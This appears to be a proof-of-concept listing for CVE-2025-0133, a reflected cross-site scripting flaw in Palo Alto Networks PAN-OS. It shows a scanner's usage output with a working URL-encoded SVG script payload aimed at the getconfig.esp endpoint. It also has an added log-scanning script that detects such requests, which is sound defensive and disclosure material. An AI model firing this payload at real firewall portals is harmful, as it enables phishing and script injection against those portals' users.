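PoC details: e0070779c45ffc4caeb9ad422f1c1e797e6b5858

Source
Related vulnerability
Title: Palo Alto Networks PAN-OS security vulnerability (CVE-2025-0133)
Description: Palo Alto Networks PAN-OS is the operating system developed by the US company Palo Alto Networks for its firewall appliances. Palo Alto Networks PAN-OS contains a security vulnerability that stems from reflected cross-site scripting and may lead to phishing attacks.
Introduction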

# CVE-2025-0133 Scan

A Python script that only checks whether a target is affected by CVE-2025-0133, a reflected cross-site scripting vulnerability in Palo Alto Networks PAN-OS. The script detects the `getconfig.esp` file and tests it for XSS.

### Usage:
```
darkfear@b0x:~/CVE-2025-0133-exploit$ python3 cve-2025-0133_scan.py -u https://target.com
[*] Sending initial probe to https://target.com/ssl-vpn/getconfig.esp
[+] Target is using "Palo Alto". Testing XSS...
[*] Sending XSS payload...
[+] Target is VULNERABLE to reflected XSS.
[+] URL: https://target.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
```
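
A defender-side check for the request shown in the usage output above, as an added example that is not part of the scanner or the original README: it scans web access-log lines for requests to `/ssl-vpn/getconfig.esp` whose decoded query parameters contain markup. The combined access-log format, the `[<>]` heuristic, and all function names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint named in the usage output above; matched case-insensitively.
ENDPOINT = "/ssl-vpn/getconfig.esp"
# Assumed heuristic: angle brackets have no place in a VPN client parameter.
MARKUP = re.compile(r"[<>]")
# Request portion of a common/combined-format access-log line (assumed format).
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_getconfig_requests(log_lines):
    """Return (client_ip, parameter, decoded_value) for each flagged parameter."""
    findings = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line this parser understands
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(ENDPOINT):
            continue  # only the endpoint discussed on this page
        # parse_qsl percent-decodes each value and turns '+' into a space,
        # so the check runs on what the server would actually reflect.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if MARKUP.search(value):
                findings.append((m.group("ip"), name, value))
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/May/2025:10:01:02 +0000] "GET /ssl-vpn/getconfig.esp?'
    'client-type=1&protocol-version=p1&user=alice&domain=%28empty_domain%29'
    '&computer=computer HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/May/2025:10:05:44 +0000] "GET /ssl-vpn/getconfig.esp?'
    'client-type=1&user=%3Csvg+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E'
    '%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E'
    '&domain=%28empty_domain%29 HTTP/1.1" 200 734',
    '198.51.100.7 - - [12/May/2025:10:06:10 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for ip, param, value in suspicious_getconfig_requests(SAMPLE_LOG):
        print(f"{ip} sent markup in '{param}': {value}")
```
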

File snapshot

```
[4.0K] /data/pocs/e0070779c45ffc4caeb9ad422f1c1e797e6b5858
├── [2.6K] cve-2025-0133_scan.py
└── [ 976] README.md

0 directories, 2 files
```